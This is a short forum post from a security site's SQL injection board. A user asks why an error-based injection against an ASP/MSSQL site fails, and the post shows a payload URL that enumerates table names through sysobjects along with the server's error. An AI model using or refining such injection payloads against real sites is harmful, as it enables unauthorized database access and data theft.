|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 66
Members: 0
Total: 66
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
But error in SQL query injection |
|
Posted: Tue Nov 02, 2010 5:14 am |
|
|
pink_spider |
Advanced user |
|
|
Joined: Aug 28, 2010 |
Posts: 91 |
|
|
|
|
|
|
|
I can not do a SQL injection site in an asp extension \:
see my shot:
Code: | http://www.site.com/script.asp?cod=999 and(1)=(convert(int, (select top 1 name from sysobjects where xtype=char(85)and name > 'sysusuarios' )))--&foto=477 |
then the sql returns me an error:
Code: | Microsoft OLE DB Provider for SQL Server erro '80040e14'
Incorrect syntax near 'sysusuarios'.
/bysys/config/config.asp, linha 326 |
I've tried everything. even in hexadecimal nothing works :s
Help-me |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|